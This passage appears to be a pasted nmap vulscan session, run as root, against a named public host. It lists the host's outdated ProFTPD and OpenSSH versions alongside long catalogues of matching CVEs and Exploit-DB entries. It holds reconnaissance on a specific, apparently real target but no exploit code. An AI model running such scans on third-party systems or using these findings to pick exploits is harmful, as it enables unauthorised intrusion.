  1686. | [15662] ProFTPD 1.3.3c compromised source remote root Trojan
  1687. | [20690] wu-ftpd 2.4/2.5/2.6,Trolltech ftpd 1.2,ProFTPD 1.2,BeroFTPD 1.3.4 FTP glob Expansion Vulnerability
  1688. | [16852] ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
  1689. | [10044] ProFTPd 1.3.0 mod_ctrls Local Stack Overflow (opensuse)
  1690. | [3730] ProFTPD 1.3.0/1.3.0a (mod_ctrls) Local Overflow Exploit (exec-shield)
  1691. | [3333] ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit 2
  1692. | [3330] ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit
  1693. | [2928] ProFTPD <= 1.3.0a (mod_ctrls support) Local Buffer Overflow PoC
  1694. | [2856] ProFTPD 1.3.0 (sreplace) Remote Stack Overflow Exploit (meta)
  1695. |
  1696. | OpenVAS (Nessus) - http://www.openvas.org:
  1697. | [103331] ProFTPD Prior To 1.3.3g Use-After-Free Remote Code Execution Vulnerability
  1698. | [63497] Debian Security Advisory DSA 1730-1 (proftpd-dfsg)
  1699. |
  1700. | SecurityTracker - https://www.securitytracker.com:
  1701. | [1028040] ProFTPD MKD/XMKD Race Condition Lets Local Users Gain Elevated Privileges
  1702. | [1026321] ProFTPD Use-After-Free Memory Error Lets Remote Authenticated Users Execute Arbitrary Code
  1703. | [1020945] ProFTPD Request Processing Bug Permits Cross-Site Request Forgery Attacks
  1704. | [1017931] ProFTPD Auth API State Error May Let Remote Users Access the System in Certain Cases
  1705. | [1017167] ProFTPD sreplace() Off-by-one Bug Lets Remote Users Execute Arbitrary Code
  1706. | [1012488] ProFTPD SITE CHGRP Command Lets Remote Authenticated Users Modify File/Directory Group Ownership
  1707. | [1011687] ProFTPd Login Timing Differences Disclose Valid User Account Names to Remote Users
  1708. | [1009997] ProFTPD Access Control Bug With CIDR Addresses May Let Remote Authenticated Users Access Files
  1709. | [1009297] ProFTPD _xlate_ascii_write() Off-By-One Buffer Overflows Let Remote Users Execute Arbitrary Code With Root Privileges
  1710. | [1007794] ProFTPD ASCII Mode File Upload Buffer Overflow Lets Certain Remote Users Execute Arbitrary Code
  1711. | [1007020] ProFTPD Input Validation Flaw When Authenticating Against Postgresql Using 'mod_sql' Lets Remote Users Gain Access
  1712. | [1003019] ProFTPD FTP Server May Allow Local Users to Execute Code on the Server
  1713. | [1002354] ProFTPD Reverse DNS Feature Fails to Check Forward-to-Reverse DNS Mappings
  1714. | [1002148] ProFTPD Site and Quote Commands May Allow Remote Users to Execute Arbitrary Commands on the Server
  1715. |
  1716. | OSVDB - http://www.osvdb.org:
  1717. | [89051] ProFTPD Multiple FTP Command Handling Symlink Arbitrary File Overwrite
  1718. | [77004] ProFTPD Use-After-Free Response Pool Allocation List Parsing Remote Memory Corruption
  1719. | [70868] ProFTPD mod_sftp Component SSH Payload DoS
  1720. | [70782] ProFTPD contrib/mod_sql.c sql_prepare_where Function Crafted Username Handling Remote Overflow
  1721. | [69562] ProFTPD on ftp.proftpd.org Compromised Source Packages Trojaned Distribution
  1722. | [69200] ProFTPD pr_data_xfer Function ABOR Command Remote DoS
  1723. | [68988] ProFTPD mod_site_misc Module Multiple Command Traversal Arbitrary File Manipulation
  1724. | [68985] ProFTPD netio.c pr_netio_telnet_gets Function TELNET_IAC Escape Sequence Remote Overflow
  1725. | [59292] ProFTPD mod_tls Module Certificate Authority (CA) subjectAltName Field Null Byte Handling SSL MiTM Weakness
  1726. | [57311] ProFTPD contrib/mod_ratio.c Multiple Unspecified Buffer Handling Issues
  1727. | [57310] ProFTPD Multiple Unspecified Overflows
  1728. | [57309] ProFTPD src/support.c Unspecified Buffer Handling Issue
  1729. | [57308] ProFTPD modules/mod_core.c Multiple Unspecified Overflows
  1730. | [57307] ProFTPD Multiple Modules Unspecified Overflows
  1731. | [57306] ProFTPD contrib/mod_pam.c Multiple Unspecified Buffer Handling Issues
  1732. | [57305] ProFTPD src/main.c Unspecified Overflow
  1733. | [57304] ProFTPD src/log.c Logfile Handling Unspecified Race Condition
  1734. | [57303] ProFTPD modules/mod_auth.c Unspecified Issue
  1735. | [51954] ProFTPD Server NLS Support mod_sql_* Encoded Multibyte Character SQL Injection Protection Bypass
  1736. | [51953] ProFTPD Server mod_sql username % Character Handling SQL Injection
  1737. | [51849] ProFTPD Character Encoding SQL Injection
  1738. | [51720] ProFTPD NLST Command Argument Handling Remote Overflow
  1739. | [51719] ProFTPD MKDIR Command Directory Name Handling Remote Overflow
  1740. | [48411] ProFTPD FTP Command Truncation CSRF
  1741. | [34602] ProFTPD Auth API Multiple Auth Module Authentication Bypass
  1742. | [31509] ProFTPD mod_ctrls Module pr_ctrls_recv_request Function Local Overflow
  1743. | [30719] mod_tls Module for ProFTPD tls_x509_name_oneline Function Remote Overflow
  1744. | [30660] ProFTPD CommandBufferSize Option cmd_loop() Function DoS
  1745. | [30267] ProFTPD src/support.c sreplace() Function Remote Overflow
  1746. | [23063] ProFTPD mod_radius Password Overflow DoS
  1747. | [20212] ProFTPD Host Reverse Resolution Failure ACL Bypass
  1748. | [18271] ProFTPD mod_sql SQLShowInfo Directive Format String
  1749. | [18270] ProFTPD ftpshut Shutdown Message Format String
  1750. | [14012] GProftpd gprostats Utility Log Parser Remote Format String
  1751. | [10769] ProFTPD File Transfer Newline Character Overflow
  1752. | [10768] ProFTPD STAT Command Remote DoS
  1753. | [10758] ProFTPD Login Timing Account Name Enumeration
  1754. | [10173] ProFTPD mod_sqlpw wtmp Authentication Credential Disclosure
  1755. | [9507] PostgreSQL Authentication Module (mod_sql) for ProFTPD USER Name Parameter SQL Injection
  1756. | [9163] ProFTPD MKDIR Directory Creation / Change Remote Overflow (palmetto)
  1757. | [7166] ProFTPD SIZE Command Memory Leak Remote DoS
  1758. | [7165] ProFTPD USER Command Memory Leak DoS
  1759. | [5744] ProFTPD CIDR IP Subnet ACL Bypass
  1760. | [5705] ProFTPD Malformed cwd Command Format String
  1761. | [5638] ProFTPD on Debian Linux postinst Installation Privilege Escalation
  1762. | [4134] ProFTPD in_xlate_ascii_write() Function RETR Command Remote Overflow
  1763. | [144] ProFTPD src/log.c log_xfer() Function Remote Overflow
  1764. |_
  1765. Service Info: OS: Unix
  1766.  
  1767. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1768. Nmap done: 1 IP address (1 host up) scanned in 13.34 seconds
  1769.  
  1770.  
  1771. root@blackbox:/usr/share/nmap/scripts# nmap --script vulscan -sV -p22 184.154.192.250
  1772. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:28 CST
  1773. Nmap scan report for server.etours.cn (184.154.192.250)
  1774. Host is up (0.037s latency).
  1775.  
  1776. PORT STATE SERVICE VERSION
  1777. 22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
  1778. | vulscan: VulDB - https://vuldb.com:
  1779. | [44077] OpenBSD OpenSSH up to 4.3 Signal denial of service
  1780. | [39331] OpenSSH 4.3p2 Audit Log linux_audit_record_event unknown vulnerability
  1781. | [43307] OpenSSH 4.0 unknown vulnerability
  1782. | [41835] OpenSSH up to 4.8 unknown vulnerability
  1783. | [38743] OpenSSH up to 4.6 unknown vulnerability
  1784. | [36382] OpenBSD OpenSSH up to 4.6 information disclosure
  1785. | [32699] OpenBSD OpenSSH 4.1 denial of service
  1786. | [2667] OpenBSD OpenSSH 4.4 Separation Monitor unknown vulnerability
  1787. |
  1788. | MITRE CVE - https://cve.mitre.org:
  1789. | [CVE-2009-2904] A certain Red Hat modification to the ChrootDirectory feature in OpenSSH 4.8, as used in sshd in OpenSSH 4.3 in Red Hat Enterprise Linux (RHEL) 5.4 and Fedora 11, allows local users to gain privileges via hard links to setuid programs that use configuration files within the chroot directory, related to requirements for directory ownership.
  1790. | [CVE-2008-4109] A certain Debian patch for OpenSSH before 4.3p2-9etch3 on etch
  1791. | [CVE-2008-1483] OpenSSH 4.3p2, and probably other versions, allows local users to hijack forwarded X connections by causing ssh to set DISPLAY to :10, even when another process is listening on the associated port, as demonstrated by opening TCP port 6010 (IPv4) and sniffing a cookie sent by Emacs.
  1792. | [CVE-2007-3102] Unspecified vulnerability in the linux_audit_record_event function in OpenSSH 4.3p2, as used on Fedora Core 6 and possibly other systems, allows remote attackers to write arbitrary characters to an audit log via a crafted username. NOTE: some of these details are obtained from third party information.
  1793. | [CVE-2010-4755] The (1) remote_glob function in sftp-glob.c and the (2) process_put function in sftp.c in OpenSSH 5.8 and earlier, as used in FreeBSD 7.3 and 8.1, NetBSD 5.0.2, OpenBSD 4.7, and other products, allow remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in SSH_FXP_STAT requests to an sftp daemon, a different vulnerability than CVE-2010-2632.
  1794. | [CVE-2008-3844] Certain Red Hat Enterprise Linux (RHEL) 4 and 5 packages for OpenSSH, as signed in August 2008 using a legitimate Red Hat GPG key, contain an externally introduced modification (Trojan Horse) that allows the package authors to have an unknown impact. NOTE: since the malicious packages were not distributed from any official Red Hat sources, the scope of this issue is restricted to users who may have obtained these packages through unofficial distribution points. As of 20080827, no unofficial distributions of this software are known.
  1795. | [CVE-2008-3234] sshd in OpenSSH 4 on Debian GNU/Linux, and the 20070303 OpenSSH snapshot, allows remote authenticated users to obtain access to arbitrary SELinux roles by appending a :/ (colon slash) sequence, followed by the role name, to the username.
  1796. | [CVE-2008-1657] OpenSSH 4.4 up to versions before 4.9 allows remote authenticated users to bypass the sshd_config ForceCommand directive by modifying the .ssh/rc session file.
  1797. | [CVE-2007-6415] scponly 4.6 and earlier allows remote authenticated users to bypass intended restrictions and execute arbitrary code by invoking scp, as implemented by OpenSSH, with the -F and -o options.
  1798. | [CVE-2007-4752] ssh in OpenSSH before 4.7 does not properly handle when an untrusted cookie cannot be created and uses a trusted X11 cookie instead, which allows attackers to violate intended policy and gain privileges by causing an X client to be treated as trusted.
  1799. | [CVE-2007-2243] OpenSSH 4.6 and earlier, when ChallengeResponseAuthentication is enabled, allows remote attackers to determine the existence of user accounts by attempting to authenticate via S/KEY, which displays a different response if the user account exists, a similar issue to CVE-2001-1483.
  1800. | [CVE-2006-5794] Unspecified vulnerability in the sshd Privilege Separation Monitor in OpenSSH before 4.5 causes weaker verification that authentication has been successful, which might allow attackers to bypass authentication. NOTE: as of 20061108, it is believed that this issue is only exploitable by leveraging vulnerabilities in the unprivileged process, which are not known to exist.
  1801. | [CVE-2006-5229] OpenSSH portable 4.1 on SUSE Linux, and possibly other platforms and versions, and possibly under limited configurations, allows remote attackers to determine valid usernames via timing discrepancies in which responses take longer for valid usernames than invalid ones, as demonstrated by sshtime. NOTE: as of 20061014, it appears that this issue is dependent on the use of manually-set passwords that causes delays when processing /etc/shadow due to an increased number of rounds.
  1802. | [CVE-2006-5052] Unspecified vulnerability in portable OpenSSH before 4.4, when running on some platforms, allows remote attackers to determine the validity of usernames via unknown vectors involving a GSSAPI "authentication abort."
  1803. | [CVE-2006-5051] Signal handler race condition in OpenSSH before 4.4 allows remote attackers to cause a denial of service (crash), and possibly execute arbitrary code if GSSAPI authentication is enabled, via unspecified vectors that lead to a double-free.
  1804. | [CVE-2006-4924] sshd in OpenSSH before 4.4, when using the version 1 SSH protocol, allows remote attackers to cause a denial of service (CPU consumption) via an SSH packet that contains duplicate blocks, which is not properly handled by the CRC compensation attack detector.
  1805. | [CVE-2006-0225] scp in OpenSSH 4.2p1 allows attackers to execute arbitrary commands via filenames that contain shell metacharacters or spaces, which are expanded twice.
  1806. | [CVE-2005-2798] sshd in OpenSSH before 4.2, when GSSAPIDelegateCredentials is enabled, allows GSSAPI credentials to be delegated to clients who log in using non-GSSAPI methods, which could cause those credentials to be exposed to untrusted users or hosts.
  1807. | [CVE-2005-2797] OpenSSH 4.0, and other versions before 4.2, does not properly handle dynamic port forwarding ("-D" option) when a listen address is not provided, which may cause OpenSSH to enable the GatewayPorts functionality.
  1808. | [CVE-2005-2666] SSH, as implemented in OpenSSH before 4.0 and possibly other implementations, stores hostnames, IP addresses, and keys in plaintext in the known_hosts file, which makes it easier for an attacker that has compromised an SSH user's account to generate a list of additional targets that are more likely to have the same password or key.
  1809. | [CVE-2001-1029] libutil in OpenSSH on FreeBSD 4.4 and earlier does not drop privileges before verifying the capabilities for reading the copyright and welcome files, which allows local users to bypass the capabilities checks and read arbitrary files by specifying alternate copyright or welcome files.
  1810. |
  1811. | SecurityFocus - https://www.securityfocus.com/bid/:
  1812. | [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
  1813. |
  1814. | IBM X-Force - https://exchange.xforce.ibmcloud.com:
  1815. | [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow
  1816. |
  1817. | Exploit-DB - https://www.exploit-db.com:
  1818. | [2444] OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit
  1819. | [21402] OpenSSH 2.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
  1820. | [3303] Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit
  1821. |
  1822. | OpenVAS (Nessus) - http://www.openvas.org:
  1823. | [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability
  1824. | [900179] OpenSSH CBC Mode Information Disclosure Vulnerability
  1825. | [881183] CentOS Update for openssh CESA-2012:0884 centos6
  1826. | [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386
  1827. | [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386
  1828. | [870763] RedHat Update for openssh RHSA-2012:0884-04
  1829. | [870129] RedHat Update for openssh RHSA-2008:0855-01
  1830. | [861813] Fedora Update for openssh FEDORA-2010-5429
  1831. | [861319] Fedora Update for openssh FEDORA-2007-395
  1832. | [861170] Fedora Update for openssh FEDORA-2007-394
  1833. | [861012] Fedora Update for openssh FEDORA-2007-715
  1834. | [840345] Ubuntu Update for openssh vulnerability USN-597-1
  1835. | [840300] Ubuntu Update for openssh update USN-612-5
  1836. | [840271] Ubuntu Update for openssh vulnerability USN-612-2
  1837. | [840268] Ubuntu Update for openssh update USN-612-7
  1838. | [840259] Ubuntu Update for openssh vulnerabilities USN-649-1
  1839. | [840214] Ubuntu Update for openssh vulnerability USN-566-1
  1840. | [831074] Mandriva Update for openssh MDVA-2010:162 (openssh)
  1841. | [830929] Mandriva Update for openssh MDVA-2010:090 (openssh)
  1842. | [830807] Mandriva Update for openssh MDVA-2010:026 (openssh)
  1843. | [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh)
  1844. | [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh)
  1845. | [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt)
  1846. | [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh)
  1847. | [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability
  1848. | [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability
  1849. | [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness
  1850. | [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
  1851. | [100584] OpenSSH X Connections Session Hijacking Vulnerability
  1852. | [100153] OpenSSH CBC Mode Information Disclosure Vulnerability
  1853. | [66170] CentOS Security Advisory CESA-2009:1470 (openssh)
  1854. | [65987] SLES10: Security update for OpenSSH
  1855. | [65819] SLES10: Security update for OpenSSH
  1856. | [65514] SLES9: Security update for OpenSSH
  1857. | [65513] SLES9: Security update for OpenSSH
  1858. | [65334] SLES9: Security update for OpenSSH
  1859. | [65248] SLES9: Security update for OpenSSH
  1860. | [65218] SLES9: Security update for OpenSSH
  1861. | [65169] SLES9: Security update for openssh,openssh-askpass
  1862. | [65126] SLES9: Security update for OpenSSH
  1863. | [65019] SLES9: Security update for OpenSSH
  1864. | [65015] SLES9: Security update for OpenSSH
  1865. | [64931] CentOS Security Advisory CESA-2009:1287 (openssh)
  1866. | [61639] Debian Security Advisory DSA 1638-1 (openssh)
  1867. | [61030] Debian Security Advisory DSA 1576-2 (openssh)
  1868. | [61029] Debian Security Advisory DSA 1576-1 (openssh)
  1869. | [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc)
  1870. | [60803] Gentoo Security Advisory GLSA 200804-03 (openssh)
  1871. | [60667] Slackware Advisory SSA:2008-095-01 openssh
  1872. | [59014] Slackware Advisory SSA:2007-255-01 openssh
  1873. | [58741] Gentoo Security Advisory GLSA 200711-02 (openssh)
  1874. | [57919] Gentoo Security Advisory GLSA 200611-06 (openssh)
  1875. | [57895] Gentoo Security Advisory GLSA 200609-17 (openssh)
  1876. | [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))
  1877. | [57492] Slackware Advisory SSA:2006-272-02 openssh
  1878. | [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5)
  1879. | [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc)
  1880. | [57470] FreeBSD Ports: openssh
  1881. | [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc)
  1882. | [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH)
  1883. | [56294] Slackware Advisory SSA:2006-045-06 openssh
  1884. | [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages
  1885. | [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory
  1886. | [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again
  1887. | [53788] Debian Security Advisory DSA 025-1 (openssh)
  1888. | [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc)
  1889. | [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc)
  1890. | [11343] OpenSSH Client Unauthorized Remote Forwarding
  1891. | [10954] OpenSSH AFS/Kerberos ticket/token passing
  1892. | [10883] OpenSSH Channel Code Off by 1
  1893. | [10823] OpenSSH UseLogin Environment Variables
  1894. |
  1895. | SecurityTracker - https://www.securitytracker.com:
  1896. | [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code
  1897. | [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information
  1898. | [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code
  1899. | [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges
  1900. | [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users
  1901. | [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges
  1902. | [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases
  1903. | [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins
  1904. | [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised
  1905. | [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions
  1906. | [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands
  1907. | [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases
  1908. | [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service
  1909. | [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process
  1910. | [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution
  1911. | [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames
  1912. | [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service
  1913. | [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service
  1914. | [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service
  1915. | [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases
  1916. | [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases
  1917. | [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases
  1918. | [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services
  1919. | [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code
  1920. | [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code
  1921. | [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users
  1922. | [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users
  1923. | [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks
  1924. | [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System
  1925. | [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System
  1926. | [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions
  1927. | [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges
  1928. | [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access
  1929. | [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted
  1930. | [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts
  1931. | [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations
  1932. | [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server
  1933. | [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
  1934. |
  1935. | OSVDB - http://www.osvdb.org:
  1936. | [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass
  1937. | [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation
  1938. | [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS
  1939. | [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS
  1940. | [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure
  1941. | [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure
  1942. | [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS
  1943. | [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS
  1944. | [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure
  1945. | [70873] OpenSSH Legacy Certificates Stack Memory Disclosure
  1946. | [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass
  1947. | [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
  1948. | [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
  1949. | [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation
  1950. | [56921] OpenSSH Unspecified Remote Compromise
  1951. | [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution
  1952. | [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure
  1953. | [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
  1954. | [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access
  1955. | [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution
  1956. | [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking
  1957. | [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
  1958. | [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution
  1959. | [43745] OpenSSH X11 Forwarding Local Session Hijacking
  1960. | [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass
  1961. | [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection
  1962. | [37315] pam_usb OpenSSH Authentication Unspecified Issue
  1963. | [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS
  1964. | [34601] OPIE w/ OpenSSH Account Enumeration
  1965. | [34600] OpenSSH S/KEY Authentication Account Enumeration
  1966. | [32721] OpenSSH Username Password Complexity Account Enumeration
  1967. | [30232] OpenSSH Privilege Separation Monitor Weakness
  1968. | [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS
  1969. | [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration
  1970. | [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution
  1971. | [29152] OpenSSH Identical Block Packet DoS
  1972. | [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS
  1973. | [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS
  1974. | [22692] OpenSSH scp Command Line Filename Processing Command Injection
  1975. | [20216] OpenSSH with KerberosV Remote Authentication Bypass
  1976. | [19142] OpenSSH Multiple X11 Channel Forwarding Leaks
  1977. | [19141] OpenSSH GSSAPIAuthentication Credential Escalation
  1978. | [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass
  1979. | [16567] OpenSSH Privilege Separation LoginGraceTime DoS
  1980. | [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS
  1981. | [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness
  1982. | [9550] OpenSSH scp Traversal Arbitrary File Overwrite
  1983. | [6601] OpenSSH *realloc() Unspecified Memory Errors
  1984. | [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow
  1985. | [6073] OpenSSH on FreeBSD libutil Arbitrary File Read
  1986. | [6072] OpenSSH PAM Conversation Function Stack Modification
  1987. | [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation
  1988. | [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass
  1989. | [5408] OpenSSH echo simulation Information Disclosure
  1990. | [5113] OpenSSH NIS YP Netgroups Authentication Bypass
  1991. | [4536] OpenSSH Portable AIX linker Privilege Escalation
  1992. | [3938] OpenSSL and OpenSSH /dev/random Check Failure
  1993. | [3456] OpenSSH buffer_append_space() Heap Corruption
  1994. | [2557] OpenSSH Multiple Buffer Management Multiple Overflows
  1995. | [2140] OpenSSH w/ PAM Username Validity Timing Attack
  1996. | [2112] OpenSSH Reverse DNS Lookup Bypass
  1997. | [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
  1998. | [1853] OpenSSH Symbolic Link 'cookies' File Removal
  1999. | [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
  2000. | [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow
  2001. | [730] OpenSSH Channel Code Off by One Remote Privilege Escalation
  2002. | [688] OpenSSH UseLogin Environment Variable Local Command Execution
  2003. | [642] OpenSSH Multiple Key Type ACL Bypass
  2004. | [504] OpenSSH SSHv2 Public Key Authentication Bypass
  2005. | [341] OpenSSH UseLogin Local Privilege Escalation
  2006. |_
  2007.  
  2008. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2009. Nmap done: 1 IP address (1 host up) scanned in 12.93 seconds
  2010.  
  2011.  
  2012. root@blackbox:/usr/share/nmap/scripts# nmap --script nmap-vulners,vulscan --script-args vulscandb -sV -p21 184.154.192.250
  2013. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:29 CST
  2014. Nmap scan report for server.etours.cn (184.154.192.250)
  2015. Host is up (0.14s latency).
  2016.  
  2017. PORT STATE SERVICE VERSION
  2018. 21/tcp open ftp ProFTPD 1.3.3e
  2019. | vulscan: VulDB - https://vuldb.com:
  2020. | [59589] ProFTPD up to 1.3.3 Use-After-Free memory corruption
  2021. | [4290] ProFTPD up to 1.3.3 mod_sftpd Big Payload denial of service
  2022. | [56304] ProFTPD up to 1.3.3 contrib/mod_sql.c) sql_prepare_where memory corruption
  2023. | [138380] ProFTPD 1.3.5b mod_copy Code Execution
  2024. | [81624] ProFTPD up to 1.3.5a/1.3.6rc1 mod_tls mod_tls.c weak encryption
  2025. | [75436] ProFTPD 1.3.4e/1.3.5 mod_copy File privilege escalation
  2026. | [10259] ProFTPD 1.3.4/1.3.5 mod_sftp/mod_sftp_pam kbdint.c resp_count denial of service
  2027. | [7244] ProFTPD up to 1.3.4 MKD/XMKD Command race condition
  2028. | [55410] ProFTPD 1.3.2/1.3.3 Telnet netio.c pr_netio_telnet_gets memory corruption
  2029. | [55392] ProFTPD up to 1.3.2 pr_data_xfer denial of service
  2030. | [50631] ProFTPD 1.3.1/1.3.2/1.3.3 mod_tls unknown vulnerability
  2031. | [46500] ProFTPD 1.3.1 mod_sql_mysql sql injection
  2032. | [46499] ProFTPD 1.3.1/1.3.2/1.3.2 Rc2 mod_sql sql injection
  2033. | [44191] ProFTPD 1.3.1 FTP Command cross site request forgery
  2034. | [36309] ProFTPD 1.3.0 Rc1 mod_sql Plaintext unknown vulnerability
  2035. | [2747] ProFTPD 1.3.0/1.3.0a mod_ctrls pr_ctrls_recv_request memory corruption
  2036. | [33495] ProFTPD 1.3.0a Configuration File affected denial of service
  2037. | [2711] ProFTPD 1.3.0a mod_tls tls_x509_name_oneline memory corruption
  2038. | [2705] ProFTPD 1.3.0 main.c CommandBufferSize denial of service
  2039. |
  2040. | MITRE CVE - https://cve.mitre.org:
